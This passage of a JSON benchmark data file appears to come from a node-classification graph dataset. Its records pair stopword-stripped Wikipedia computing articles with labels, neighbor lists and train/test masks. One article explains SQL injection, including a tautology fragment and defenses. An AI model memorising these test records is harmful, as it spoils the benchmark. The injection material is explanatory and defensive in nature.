    "text": "SQL_injection:sql injection sql injection code injection technique used attack data-driven applications malicious sql statements inserted entry field execution e.g dump database contents attacker sql injection must exploit security vulnerability application software example user input either incorrectly filtered string literal escape characters embedded sql statements user input strongly typed unexpectedly executed sql injection mostly known attack vector websites used attack type sql database sql injection attacks allow attackers spoof identity tamper existing data cause repudiation issues voiding transactions changing balances allow complete disclosure data system destroy data make otherwise unavailable become administrators database server 2012 study observed average web application received 4 attack campaigns per month retailers received twice many attacks industries first public discussions sql injection started appearing around 1998 example 1998 article phrack magazine sql injection sqli considered one top 10 web application vulnerabilities 2007 2010 open web application security project 2013 sqli rated number one attack owasp top ten four main sub-classes sql injection storm worm one representation compounded sqli classification represents state sqli respecting evolution 2010—further refinement underway form injection occurs user input filtered escape characters passed sql statement results potential manipulation statements performed database end-user application following line code illustrates vulnerability sql code designed pull records specified username table users however username variable crafted specific way malicious user sql statement may code author intended example setting username variable using comments even block rest query three types sql comments three lines space end renders one following sql statements parent language code used authentication procedure example could used force selection every data field users rather one specific user name coder intended evaluation 1'= 1 always true following value username statement would cause deletion users table well selection data userinfo table essence revealing information every user using api allows multiple statements input renders final sql statement follows specified sql server implementations allow multiple statements executed one call way sql apis php codice_1 function allow security reasons prevents attackers injecting entirely separate queries n't stop modifying queries blind sql injection used web application vulnerable sql injection results injection visible attacker page vulnerability may one displays data display differently depending results logical statement injected legitimate sql statement called page type attack traditionally considered time-intensive new statement needed crafted bit recovered depending structure attack may consist many unsuccessful requests recent advancements allowed request recover multiple bits unsuccessful requests allowing consistent efficient extraction several tools automate attacks location vulnerability target information established one type blind sql injection forces database evaluate logical statement ordinary application screen example book review website uses query string determine book review display url codice_2 would cause server run query would populate review page data review id 5 stored table bookreviews query happens completely server user know names database table fields user know query string user sees url returns book review hacker load urls codice_3 codice_3 may result queries respectively original review loads 1=1 url blank error page returned 1=2 url returned page created alert user input invalid words caught input test script site likely vulnerable sql injection attack query likely passed successfully cases hacker may proceed query string designed reveal version number mysql running server codice_3 would show book review server running mysql 4 blank error page otherwise hacker continue use code within query strings glean information server another avenue attack discovered goals achieved second order sql injection occurs submitted values contain malicious commands stored rather executed immediately cases application may correctly encode sql statement store valid sql another part application without controls protect sql injection might execute stored sql statement attack requires knowledge submitted values later used automated web application security scanners would easily detect type sql injection may need manually instructed check evidence attempted sql injection well known attack easily prevented simple measures apparent sql injection attack talktalk 2015 bbc reported security experts stunned large company would vulnerable development platforms parameterized statements work parameters used sometimes called placeholders bind variables instead embedding user input statement placeholder store value given type arbitrary sql fragment hence sql injection would simply treated strange probably invalid parameter value many cases sql statement fixed parameter scalar table user input assigned bound parameter easily put using parameterized queries definitely prevent sql injection mainly means variables n't query strings would accept arbitrary sql inputs however parameters given types definitely necessary parameterized queries require developer define code therefore without parameterized queries anyone could put kind sql code field database erased parameters set username person would able put username without kind code using object-relational mapping libraries avoids need write sql code orm library effect generate parameterized sql statements object-oriented code straightforward though error-prone way prevent injections escape characters special meaning sql manual sql dbms explains characters special meaning allows creating comprehensive blacklist characters need translation instance every occurrence single quote codice_6 parameter must replaced two single quotes codice_7 form valid sql string literal example php usual escape parameters using function codice_8 sending sql query function prepends backslashes following characters codice_9 codice_10 codice_11 codice_12 codice_6 codice_14 codice_15 function normally used make data safe sending query mysql php similar functions database systems pg_escape_string postgresql function codice_16 works escaping characters used especially querying databases escaping functions php returns string backslashes characters need quoted database queries etc characters single quote double quote backslash nul null byte routinely passing escaped strings sql error prone easy forget escape given string creating transparent layer secure input reduce error-proneness entirely eliminate integer float boolean string parameters checked value valid representation given type strings must follow strict pattern date uuid alphanumeric etc checked match pattern limiting permissions database login used web application needed may help reduce effectiveness sql injection attacks exploit bugs web application example microsoft sql server database logon could restricted selecting system tables would limit exploits try insert javascript text columns database",
    "neighbors": [
      5636,
      10756,
      11,
      8735,
      4133,
      8742,
      9256,
      1579,
      3629,
      7739,
      9791,
      1088,
      11334,
      6219,
      9293,
      1108,
      4198,
      107,
      7787,
      10867,
      119,
      5245,
      5246,
      3709,
      8320,
      7809,
      3711,
      9356,
      10392,
      4772,
      2213,
      10412,
      10413,
      7855,
      8368,
      3262,
      5827,
      2758,
      7368,
      6373,
      5866,
      3320,
      9467,
      10492,
      5373,
      774,
      1803,
      8978,
      11030,
      4892,
      5404,
      8990,
      5407,
      8998,
      5433,
      2878,
      331,
      10579,
      4439,
      5464,
      1882,
      7515,
      4956,
      8539,
      2398,
      6497,
      3428,
      3941,
      7526,
      7022,
      5491,
      8054,
      2936,
      7035,
      9087,
      2945,
      3462,
      3473,
      3986,
      1429,
      4507,
      2975,
      9125,
      939,
      9646,
      1970,
      6579,
      11191,
      10682,
      8644,
      3525,
      9160,
      9688,
      6636,
      11244,
      8176,
      10737,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 900,
    "label": 2,
    "text": "Linux_PAM:linux pam linux pluggable authentication modules pam provide dynamic authentication support applications services linux system linux pam evolved unix pluggable authentication modules architecture linux-pam separates tasks authentication four independent management groups",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
      6180,
      8242,
      9266,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      2143,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7812,
      7821,
      4238,
      10382,
      2195,
      2711,
      6808,
      9882,
      1694,
      2723,
      8364,
      10933,
      5815,
      5822,
      5824,
      1736,
      2762,
      8909,
      6352,
      8410,
      10971,
      4831,
      8928,
      1761,
      2278,
      233,
      7403,
      10482,
      2294,
      8439,
      2809,
      4360,
      1291,
      4367,
      792,
      10016,
      295,
      7983,
      823,
      6968,
      7992,
      318,
      3911,
      6988,
      10063,
      5975,
      11095,
      10091,
      5492,
      7540,
      8573,
      1406,
      8066,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 901,
    "label": 4,
    "text": "Dendroid_(malware):dendroid malware dendroid malware affects android os targets mobile platform first discovered early 2014 symantec appeared underground sale 300 certain features noted used dendroid ability hide emulators time first discovered 2014 one sophisticated android remote administration tools known time one first trojan applications get past google bouncer caused researchers warn easier create android malware due also seems followed footsteps zeus spyeye simple-to-use command control panels code appeared leaked somewhere around 2014 noted apk binder included leak provided simple way bind dendroid legitimate applications capable",
    "neighbors": [
      9536,
      9569,
      9282,
      11266,
      10756,
      9800,
      4649,
      2409,
      5131,
      2508,
      5261,
      4883,
      10297,
      7515,
      10141,
      3807
    ],
    "mask": "Test"
  },
  {
    "node_id": 902,
    "label": 4,
    "text": "Microbial_DNA_barcoding:microbial dna barcoding microbial dna barcoding use meta dna barcoding characterize mixture microorganisms dna metabarcoding method dna barcoding uses universal genetic markers identify dna mixture organisms using metabarcoding assess microbial communities long history back 1972 carl woese mitchell sogin stephen sogin first tried detect several families within bacteria using 5s rrna gene years later new tree life three domains proposed woese colleagues first use small subunit ribosomal rna ssu rrna gene distinguish bacteria archaea eukaryotes approach ssu rrna gene made way frequently used genetic marker prokaryotes 16s rrna eukaryotes 18s rrna tedious process cloning dna fragments sequencing got fastened steady improvement sequencing technologies development hts high-throughput-sequencing early 2000s ability deal massive data using modern bioinformatics cluster algorithms investigating microbial life got much easier genetic diversity varying species species therefore possible identify distinct species recovery short dna sequence standard part genome short sequence defined barcode sequence requirements specific part genome serve barcode high variation two different species much differences gene two individuals species make differentiating individual species easier bacteria archaea 16s rrna/rdna gene uses common housekeeping gene prokaryotic organisms therefore used standard barcode assess prokaryotic diversity protists corresponding 18s rrna/rdna gene used distinguish different species fungi internal transcribed spacer region ribosomal cistron used existing diversity microbial world unraveled completely yet although know mainly composed bacteria fungi unicellular eukaryotes taxonomic identification microbial eukaryotes requires exceedingly skillful expertise often difficult due small sizes organisms fragmented individuals hidden diversity cryptic species prokaryotes simply taxonomically assigned using traditional methods like microscopy small morphologically indistinguishable therefore via use dna metabarcoding possible identify organisms without taxonomic expertise matching short high throughput sequences hts -derived gene fragments reference sequence database e.g ncbi mentioned qualities make dna barcoding cost-effective reliable less time consuming method compared traditional ones meet increasing need large-scale environmental assessments lot studies followed first usage woese et al. covering variety applications biological ecological research metabarcoding used also medicine human biology bacterial barcodes used e.g investigate microbiome bacterial colonization human gut normal obese twins comparison studies newborn child adult gut bacteria composition additionally barcoding plays major role biomonitoring e.g rivers streams grassland restoration conservation parasitology environmental parasitology paleoparasitology rely barcoding useful tool disease investigating management cyanobacteria group photosynthetic prokaryotes similar prokaryotes taxonomy cyanobacteria using dna sequences mostly based similarity within 16s ribosomal gene thus common barcode used identification cyanobacteria 16s rdna marker difficult define species within prokaryotic organisms 16s marker used determining individual operational taxonomic units otus cases otus also linked traditionally defined species therefore considered reliable representation evolutionary relationships however analyzing taxonomic structure biodiversity whole cyanobacterial community see dna metabarcoding informative use markers specific cyanobacteria universal 16s bacterial primers used successfully isolate cyanobacterial rdna environmental samples also recover many bacterial sequences use cyanobacteria-specific phyto-specific 16s markers commonly used focusing cyanobacteria sets primers tested barcoding metabarcoding environmental samples gave good results screening majority non-photosynthetic non-cyanobacterial organisms number sequenced cyanobacterial genomes available databases increasing besides 16s marker phylogenetic studies could therefore include also variable sequences sequences protein-coding genes gyrb rpoc rpod rbcl hetr psba rnpb nifh nifd internal transcribed spacer ribosomal rna genes 16s-23s rrna-its phycocyanin intergenic spacer pc-igs however nifd nifh used identification nitrogen-fixing cyanobacterial strains dna barcoding cyanobacteria applied various ecological evolutionary taxonomical studies examples include assessment cyanobacterial diversity community structure identification harmful cyanobacteria ecologically economically important waterbodies assessment cyanobacterial symbionts marine invertebrates potential serve part routine monitoring programs occurrence cyanobacteria well early detection potentially toxic species waterbodies might help us detect harmful species start form blooms thus improve water management strategies species identification based environmental dna could particularly useful cyanobacteria traditional identification using microscopy challenging morphological characteristics basis species delimitation vary different growth conditions identification mycroscope also time-consuming therefore relatively costly molecular methods detect much lower concentration cyanobacterial cells sample traditional identification methods reference database collection dna sequences assigned either species function used link molecular obtained sequences organism pre-existing taxonomy general databases like ncbi platform include kind sequences either whole genomes specific marker genes organisms also different platforms sequences distinct group organisms stored e.g unite database exclusively fungi sequences pr2 database solely protist ribosomal sequences databases curated allows taxonomic assignment higher accuracy using uncurated databases reference",
    "neighbors": [
      897,
      1022
    ],
    "mask": "None"
  },
  {
    "node_id": 903,
    "label": 3,
    "text": "Switchover:switchover switchover manual switch one system redundant standby computer server system network upon failure abnormal termination previously active server system network perform system maintenance installing patches upgrading software hardware automatic switchover redundant system error condition without human intervention called failover manual switchover error would used automatic failover available possibly overall system complex",
    "neighbors": [
      9184,
      9919,
      3450,
      3927
    ],
    "mask": "Test"
  },
  {
    "node_id": 904,
    "label": 5,
    "text": "BEEP:beep blocks extensible exchange protocol beep framework creating network application protocols beep includes building blocks like framing pipelining multiplexing reporting authentication connection message-oriented peer-to-peer p2p protocols support asynchronous full-duplex communication message syntax semantics defined beep profiles associated one beep channels channel full-duplex pipe framing-mechanism enables simultaneous independent communication peers beep defined rfc 3080 independently underlying transport mechanism mapping beep onto particular transport service defined separate series documents profiles channels framing mechanism used beep exchange different kinds messages content type encoding defaulted specification leaving full flexibility using binary textual format open protocol designer profiles define functionality protocol message syntax semantics channels full-duplex pipes connected particular profile messages sent different channels independent asynchronous multiple channels use profile one connection beep also includes tls encryption sasl authentication 1998 marshall t. rose also worked pop3 smtp snmp protocols designed bxxp protocol subsequently handed internet engineering task force ietf workgroup summer 2000 2001 ietf published beep rfc 3080 beep tcp rfc 3081 enhancements bxxp three notable start beep session initiating peer connects listening peer peers sending positive reply containing greeting element immediately simultaneously greeting contains three different elements example greeting answer profiles define syntax semantics messages protocol functionality based beep single beep session provide access multiple profiles identify profile unique string assigned profile identifier format uniform resource identifier uri uniform resource name urn past uri format profile identifier lead confusion similar web address avoid misunderstandings newer profiles use urn format example profile identifier beep messages structured according mime standard sometimes misunderstandings beep using xml messages small subset xml used channel 0 transparent profile designer beep user profile designer message content format used textual format like json xml well binary data xml used channel management tls standard profile defined beep example successful channel close message exchange rfc3080 larger messages split multiple parts distributed number sequence frames beep defines 5 message types allow application protocols patterns needed following common application protocol patterns implemented like follows beep supports sequence frames seq implement flow control channel level sequence frames defined rfc 3081 section 3.3 transmission control protocol tcp defines sequence mechanism transport layer level supports flow control related connection flow control channel level beep needed ensure channel big message monopolizes entire connection extend sequence frames used support quality service qos avoid starvation deadlock",
    "neighbors": [
      8640,
      2274,
      10341,
      11210,
      8523,
      10924,
      3629,
      6993,
      9909,
      7318,
      5433,
      8766
    ],
    "mask": "Test"
  },
  {
    "node_id": 905,
    "label": 2,
    "text": "Jurix:jurix jurix early gnu/linux distribution created florian la roche former employee legal department saarland university distribution maintained 1993 1999 hosted now-defunct jurix.jura.uni-sb.de susix.jura.uni-sb.de domains 1996 jurix superseded slackware base suse linux name jurix borrowed department first http server named alexander sigel known whether name taken nearby dutch law organisation jurix simply portmanteau jura meaning law german linux readme 1999 touts following software among others",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      823,
      439,
      56,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      3791,
      1110,
      9693,
      225,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "Test"
  },
  {
    "node_id": 906,
    "label": 4,
    "text": "SQLFilter:sqlfilter sqlfilter plugin omnipeek indexes packets trace files sqlite database packets searched using sql queries matching packets loaded directly omnipeek analyzed packet database also used build multi-tier data mining network forensics systems companies save large quantities network traffic disk tools like wildpackets sqlfilter make possible search packet data efficiently network trouble shooters revolutionizes job finding packets sqlfilter allow users search packets across thousands trace files also loads resulting packets directly omnipeek etherpeek cuts many steps usually involved process dramatically shortens time knowledge time fix indepth discussion sqlfilter read packet data mining network forensics",
    "neighbors": [
      8121,
      5546
    ],
    "mask": "None"
  },
  {
    "node_id": 907,
    "label": 3,
    "text": "Turmoil_(1984_video_game):turmoil 1984 video game turmoil platform game released 1984 zx spectrum 1986 msx bug byte player takes control mechanic mick employed rich arabian sheikh sheikh refused pay mick work done mick decides steal collection expensive cars lieu payment must build cars collecting oil dripping oil tank oil also used offensive weapon pursuing arabian guards playing area consists number platforms ladders conveyor belts swinging ropes mick must negotiate first must collect oil must take tap dripping oil oil collected must taken garage mick empty drop time fill car car invisible initially built drop oil deposited first level car mini subsequent levels cars become sleek expensive also present level number enemies resembling arabs attack mick cause lose life unlike platform games main character jump must fall onto one springs present level bounce different platform arabs also make use ladders ropes springs reviews overwhelmingly positive crash gave game 90 crash smash spectrum called hit 3.5/5 dave nicholls spectrum said springs great idea crash called slick well executed program retrogaming website retro view despite commenting politically incorrect nature using arabs enemies claims comes pure fun-filled platforming speccy n't come much better turmoil 'it knockout 8-bit videogaming decided turmoil earned crash smash release opinion well deserved giving overall rating 93 game designed written david turner",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 908,
    "label": 2,
    "text": "AMPPS:ampps ampps solution stack apache mysql mongodb php perl python windows nt linux macos comes 442 php web applications 1000 php classes 6 versions php ampps created softaculous ltd. company founded 2009 makes softaculous auto installer ampps used develop php mysql applications like wordpress joomla drupal software 442 php applications",
    "neighbors": [
      865,
      8644,
      8582,
      1353,
      8554,
      823,
      7022,
      8976,
      4919
    ],
    "mask": "Test"
  },
  {
    "node_id": 909,
    "label": 2,
    "text": "ISPF:ispf computing interactive system productivity facility ispf software product many historic ibm mainframe operating systems currently z/os operating system runs ibm mainframes includes screen editor user interface emulated microcomputer editors sold commercially starting late 1980s including spfpc ispf primarily provides ibm 3270 terminal interface set panels panel may include menus dialogs run tools underlying time sharing option tso generally panels provide convenient interface tasks—most execute modules ibm mainframe utility programs actual work ispf frequently used manipulate z/os data sets via program development facility ispf/pdf ispf user-extensible often used application programming interface many vendors created products z/os use ispf interface early version called merely spf introduced mvs system 1974 originally stood structured programming facility since introduced time structured programming concepts later name changed system productivity facility 1985 ibm ported ispf/pdf vm/sp operating system able use either pdf xedit editor ispf also run z/os batch job user signs tso start ispf/pdf menuing system provides access many useful tools application development administering z/os operating system tools include underlying ispf/pdf extensive set tools allow application developers create panel-driven applications set guidelines promote consistent use ispf functions panel character-based window encompass part 3270 session screen real estate see text-based user interfaces mainframe software vendors used ispf functions create applications tools similar appearance operation ispf similarly many installations write informal tools use ispf services ispf services generally available programmer shop used write panels either personal shop-wide use writing either compiled languages c cobol pl/i interpreted languages clist rexx ispf applications used perform so-called file tailoring functions customisation specially crafted jcl members called skeletons submitted batch jobs mainframe editor screen formatted 2 lines info command line top bottom -- user choice six character line number column left margin remainder screen width filled records dataset edited primary commands apply whole dataset find print sort etc typed command line line commands apply specific line copy move repeat insert exclude delete text flow text split entered over-typing line number fields one two character code representing command applied line followed optional number modifies supplied command editor several key features editor also invoked 'view mode behaves like editor allow saving data edited files also saved different name creating replacing another file ispf provides 'editor interface lets application program display arbitrary data familiar editor panel thus many vendor packages use familiar interface ispf designed customized user fairly new concept 1974 introduced supports set 24 function keys pressed execute commands customizable user replace default commands assigned key preferred command series commands user settings stored centrally user logon terminal session remember previously-chosen commands key personal computers copied set 12 function keys even defaults endured f1 key triggers help function large number mainframe pc programs ispf remembers user choices things screen colors layout location command line scrolling preferences also remembers last-used data set names panel next time panel used names already filled convenient mainframe programmers frequently work files repeatedly many early users pcs mainframe programmers users accustomed liked ispf panel system led several companies create versions ispf run windows unix pc systems 1984 ibm introduced ez-vu dialog manager dos pcs later os/2 spf/se 365 kedit editors still sold currently free spflite currently available ispf z/os provides built-in downloadable client program install run windows pcs unix workstations client program called ispf workstation agent communicates directly ispf z/os provides point-and-click graphical user interface automatically ispf workstation agent used edit pc based files ispf editor take advantage editor strengths",
    "neighbors": [
      8154,
      4546,
      9030,
      10280,
      7053,
      7217,
      6706,
      3443,
      1235,
      8213,
      6678,
      5463,
      2168,
      8502,
      5562,
      9977,
      9724,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 910,
    "label": 9,
    "text": "Java_Web_Start:java web start computing java web start also known javaws javaws jaws framework developed sun microsystems oracle allows users start application software java platform directly internet using web browser key benefits technology include seamless version updating globally distributed applications greater control memory allocation java virtual machine java web start distributed part java platform included downloads jre jdk deprecated oracle java se 9 removed java se 11 code java web start released oracle part openjdk thus openjdk originally support icedtea-web provides independent open source implementation java web start currently developed adoptopenjdk community redhat karakun ag bundled official openjdk installer unlike java applets web start applications run inside browser default run sandbox applets several minor extensions like allowing load save file explicitly selected user file selection dialog signed applications configured additional permissions web start advantage applets overcomes many compatibility problems browsers java plugins different jvm versions web start programs longer integrated part web page independent applications run separate frame web start also launch unmodified applets packaged inside .jar files writing appropriate jnlp file file also pass applet parameters applets also run separate frame applet launcher may support specific cases like loading class resource like applets java web start cross-platform jdk9 java applets deprecated oracle java web start intended replacement march 2018 oracle announced include java web start java se 11 18.9 lts later developers need transition deployment technologies developer prepares special xml file jnlp extension file describes application requirements code location parameters additional permissions browser downloads file following mime type codice_1 opens web start tool web start tool downloads necessary resources launches application java web start provides series classes codice_2 package provide various services application sun designed services aim allowing carefully controlled access resources files system clipboard restricting application authorized operations sun introduced version 1.0 web start march 2001 64-bit windows support added java 6 later 64-bit java first available since j2se 1.4 web start comes default part java runtime environment jre called codice_3 computer administrators longer install separately programmers often speak java network launching protocol jnlp interchangeably term web start jnlp protocol defined xml schema specifies launch java web start applications jnlp consists set rules defining exactly implement launching mechanism jnlp files include information location jar package file name main class application addition parameters program properly configured browser passes jnlp files java runtime environment jre turn downloads application onto user machine starts executing development jnlp took place java community process jsr 56 important web start features include ability automatically download install jre case user java installed programmers specify jre version given program needs order execute user remain connected internet execute downloaded programs execute locally maintained cache updates software download web become available user connection internet thus easing burden deployment computer user use jnlp simply installing jnlp client commonly java web start installation occur automatically end-user sees client launcher downloading installing java application first executed jnlp works similar fashion http/html works web rendering html webpage user clicks weblink browser submits url webserver replies html file browser requests resources referred file images css finally renders page received enough information page rendering usually starts resources downloaded resources critical layout page images follow afterwards jnlp mirrors process way web browser renders webpage jnlp client renders java app user clicks weblink browser submits url webserver replies jnlp file instead html file application jnlp client parses file requests resources specified jar files waits retrieval required resources launches application jnlp file list resources lazy informs jnlp client application need resources start retrieve later when/if application requests example gives simple jnlp file launch applet specifying code base source main class window size file contains necessary references self-sufficient launch application permissions requested code run sandbox jnlp also states application run offline already cached updated background process reduce size java web start application sun microsystems introduced compression system called pack200 java 1.5.0 compress large jar file one-ninth original size contains java classes java web start supported pack200 since first appeared initially feature required server-side cooperation certain amount expertise set sun introduced java se 6u10 pack200 support became available without need special server support application designers enable disable feature within jnlp files slow connections pack200 gives performance boost application startup time download time default java web start applications run restricted means access system resources local files publishers remove restrictions signing web start applications codice_4 tool comes jdk open-source icedtea project provides alternative jnlp implementation icedtea-web version 1.7.2 also works newer versions without official jws support openwebstart project run java web start base application release java 11 webswing specialized web server running swing based java applications browser jnlp implementations sun reference implementation",
    "neighbors": [
      3712,
      4358,
      7176,
      7947,
      10526,
      2339,
      5031,
      5677,
      6067,
      9011,
      6074,
      10683,
      572,
      7485,
      10684,
      3519,
      5567,
      9665,
      7750,
      6860,
      3920,
      10193,
      1363,
      9178,
      4960,
      1250,
      2658,
      5987,
      3560,
      3561,
      3562,
      7146,
      4972,
      5612,
      5872,
      8825,
      9841,
      3573,
      9078,
      3705,
      2556,
      3966,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 911,
    "label": 7,
    "text": "CloudBolt:cloudbolt cloudbolt hybrid cloud management platform developed cloudbolt software deploying managing virtual machines vms applications resources public clouds e.g. aws ms azure gcp private data centers e.g. vmware openstack platform developed alexandre augusto auggy da rocha bernard sanders da rocha began work prototype platform 2010 calling smartcloud 1.0 together created generalized solution released august 2011 smartcloud 2.0 early version focused simple installs upgrades virtual machines building extensible product customers could use platform integrating technologies 2012 renamed company cloudbolt software avoid name conflict ibm offering released version cloudbolt command control 3.0 2014 product name cloudbolt command control c2 simplified cloudbolt product timeline company received series funding insight venture partners july 2018",
    "neighbors": [
      6018,
      1539,
      8451,
      6153,
      5770,
      6027,
      4236,
      10893,
      526,
      1935,
      272,
      4623,
      8592,
      405,
      2965,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      4388,
      9766,
      39,
      5159,
      2217,
      6444,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      2496,
      4289,
      8515,
      10820,
      3269,
      11201,
      1224,
      8520,
      4683,
      4429,
      590,
      1102,
      7248,
      1362,
      467,
      5202,
      9682,
      7512,
      10200,
      6618,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      3819,
      7660,
      8044,
      2170,
      5499,
      253,
      8446,
      8191
    ],
    "mask": "Test"
  },
  {
    "node_id": 912,
    "label": 2,
    "text": "Softlanding_Linux_System:softlanding linux system softlanding linux system sls one first linux distributions founded peter macdonald may 1992 slogan time gentle touchdowns dos bailouts sls first release offer comprehensive linux distribution containing linux kernel gnu basic utilities including implementation x window system sls popular linux distribution time considered rather buggy users soon superseded slackware started cleanup sls patrick volkerding yggdrasil linux/gnu/x among others similarly ian murdock frustration sls led create debian project",
    "neighbors": [
      8837,
      7435,
      10127,
      657,
      2321,
      6675,
      4887,
      10394,
      673,
      3745,
      10530,
      11297,
      9253,
      10149,
      11305,
      7854,
      9902,
      2738,
      4790,
      823,
      439,
      56,
      4279,
      59,
      3903,
      4673,
      2375,
      4039,
      8907,
      3791,
      4437,
      1110,
      11221,
      9693,
      2914,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      9461,
      6393,
      11388,
      8957
    ],
    "mask": "None"
  },
  {
    "node_id": 913,
    "label": 7,
    "text": "3Station:3station 3station diskless workstation developed bob metcalfe 3com first available 1986 3station/2e 10 mhz 80286 processor 1 megabyte ram expandable vga-compatible graphics video ram integrated aui/10base2 bnc network transceivers lan access product used single printed-circuit board four custom asics neither floppy disk drive hard disk booted server stored end-user files 3com advertised significant cost savings due 3station ease installation low maintenance would referred banner total cost ownership 3station cost lay somewhere ibm pc clone ibm pc day commercially successful similarly configured low end workstations followed 3stations sold package 3server central hub australian taxation office ato significant customer setup groupe bull subsidiary bull hn née honeywell eventually purchasing many thousand 3stations associated 3server machines network enabled tax office centrally control software versions canberra office distributing australia wide without tedium cost updating thousands independent hard drive based pcs 286 processor became obsolete ato opened tender replacement 3station 2e suitable 386 based machine tender process eventually bull hn product labelled 3station/386 shared external case common part 3com little input design supplying technical help access networking chip sets internals custom designed single board based 3com etherlink ii networking ati graphics 3station 2 3s manufactured license sydney contract ended",
    "neighbors": [
      1776,
      6129,
      10926
    ],
    "mask": "Test"
  },
  {
    "node_id": 914,
    "label": 4,
    "text": "DNSWL:dnswl dnswl dns-based whitelist whitelist semi-trusted locations internet locations consist ip addresses may reputed low occurrences spamming natural language understanding mature field common computer processes used spam filtering apply heuristics avoid presenting many useless messages email recipients severe impact reducing smtp reliability creating false positives i.e. silently dropping legitimate messages whitelists tackle task vouching sender implies identifying accountable party sender belongs dns whitelisting also applied web traffic incident response network forensics since helps analyst tell malicious domains apart normal web surfing however recommended actively block web traffic whitelist since would cause even legit web surfing blocked ipv6 blacklisting realistic option greatly increased addresses whitelisting used reduce huge address space set manageable size first build global whitelist ipv6 registered senders second blacklist within accepting authentic sender registration request least possible eliminate spambots",
    "neighbors": [
      1667,
      8202,
      7949,
      5012,
      10263,
      8093,
      8224,
      10275,
      8747,
      8373,
      182,
      4294,
      2887,
      3145,
      5835,
      1495,
      3032,
      9053,
      5470,
      6762,
      1899,
      6261
    ],
    "mask": "None"
  },
  {
    "node_id": 915,
    "label": 7,
    "text": "OProject@Home:oproject home oproject home volunteer distributed computing project running berkeley open infrastructure network computing boinc based dedicated library olib project directed lukasz swierczewski student college computer science business administration lomza computer science automation institute 2016 seems abandoned shor algorithm shor algorithm dp main subprojects oproject home objective test quantum algorithms e.g shor algorithm quantum computing gsce-sv verifies correctness goldbach conjecture alx non-cpu-intensive nci subproject capable running arm-based cpus running android linux used research develop artificial intelligence computer networks project supports playstation 3 weird engine subproject calculates weird numbers numbers available project database according oeis largest publicly available database numbers ongoing work application analyzing status water earth oproject home uses data nasa noaa satellites analyzed data taken devices avhrr amsr used measure earth radiation predominantly infrared based information easy calculate sea surface temperature ice concentration point earth information enable perform analysis simulations climate subprojects running platform oproject home important science address difficult unsolved problems physics theoretical mathematics example goldbach conjecture proposed 1742 never disproven even clear whether problem solved range numbers infinite also known odd weird numbers calculated weird numbers even climate change global warming also raised number controversies future goal effectively analyze entire earth predict probability various possible threats people systems warn natural disasters hurricanes cyclones may arise future although future development sample video showing sea surface temperature 1982 generated order show result simulation based publicly available databases organisations noaa nasa volunteer computing projects progress relies recruiting number users willing donate computing power project projects usually run background computer idle little performance impact person using computer side effect project develop high-performance algorithms various subprojects source code programs open available public download google code licensed gpl license data generated project also available project website also distributed gpl license project also open new subprojects although current focus continued development software order ensure stable platform project officially launched 13 august 2012 9 october 2012 2243 volunteers 1779 hosts participated project oproject 9th place boinc projects amount new hosts well-known wcg seti home milkyway collatz conjecture primegrid projects september 30 2012 project lead released news launch oproject home boinc official website later day project added overall list distributed systems",
    "neighbors": [
      8262,
      8937,
      5612,
      6797,
      9964,
      7983,
      3282,
      6421,
      823,
      2939,
      8029
    ],
    "mask": "Test"
  },
  {
    "node_id": 916,
    "label": 9,
    "text": "GNU_LibreJS:gnu librejs gnu librejs simply librejs free software web browser extension mozilla firefox-based browsers created gnu project purpose block nonfree nontrivial javascript programs allow free trivial js user web browser add-on created address so-called javascript trap first described richard stallman 2009 situation many users unknowingly run proprietary software web browsers gnu librejs aims block nonfree javascript programs present many websites developed part gnu project ruben rodriguez nik nyby included default gnu icecat browser also work tor add-on allows site whitelisting e-mail detection system users contact page webmasters order persuade making javascript code compliant librejs according free software foundation many websites whitelisted break using add-on due pervasiveness proprietary javascript code web nevertheless programmer activist richard stallman supports usage gnu librejs",
    "neighbors": [
      3969,
      546,
      803,
      10851,
      3462,
      9320,
      1101,
      8909,
      2864,
      8147,
      10971
    ],
    "mask": "Test"
  },
  {
    "node_id": 917,
    "label": 4,
    "text": "Terry_Cutler:terry cutler terry cutler canadian cyber security expert cyologist teacher often described ethical hacker long term work cyber security protection cutler founder former cto current ceo cyology labs vice-president cyber security sirco also creator internet safety university cyology labs focal point cyber security data safety prior founding cyology labs 2015 cutler founded digital locksmiths inc. focusing data security cloud mobile solutions cutler often cited source cyber security featured various televisions shows across canada 2005 terry cutler worked cyber security starting working companies novell canada part work became certified ethical hacker leaning methods hackers work putting knowledge work prevent illegal access data systems years expertise cyber security led featured news shows across canada talking online safety identity theft hacking rise cyber bullying latter part 2000s 2010s would also become member high technology crime investigation association htcia center internet security cis years cutler regular contributor securityweek.com part expert panels 2011 cutler left novell canada founded digital locksmiths inc. montreal-based company focuses data security defense especially cloud mobile solutions also served chief technology officer 2013 company introduced product known s.p.e.c. security privacy electronic concierge designed help keep data safe cutler asked use expertise assist author robert beggs technical reviewer book mastering kali linux advanced penetration testing later calling must security library would go create course internet safety e-learning online courses promoted umbrella internet safety university courses designed teach individuals keep data safe avoid unintentional breaches personal data online course also addresses subjects sexting cyberbullying advising parents identify deal happens children cutler later described initiative giving back community 2015 cutler left digital 